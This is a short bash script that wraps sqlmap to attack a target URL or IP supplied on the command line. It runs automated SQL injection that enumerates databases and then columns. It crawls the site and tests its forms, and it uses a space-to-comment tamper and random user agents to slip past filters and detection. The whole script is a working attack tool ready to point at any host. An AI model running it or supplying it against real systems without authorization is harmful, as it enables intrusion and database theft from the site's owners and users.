#!/bin/bash

if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <URL/IP>"
    exit 1
fi

sqlmap -u "$1" --dbs --tamper=space2comment --random-agent --forms --crawl=2

sqlmap -u "$1" --columns --tamper=space2comment --random-agent --forms --crawl=2
